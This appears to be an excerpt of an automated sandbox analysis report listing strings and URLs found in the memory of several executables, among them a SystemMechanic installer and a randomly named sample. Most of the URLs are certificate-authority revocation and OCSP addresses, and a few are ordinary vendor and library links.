Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://compositewpf.codeplex.com/
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2683790959.0000025676B3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://download.iolo.net
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://google.com
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0H
Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0&
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sf.symcd.com0&
Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
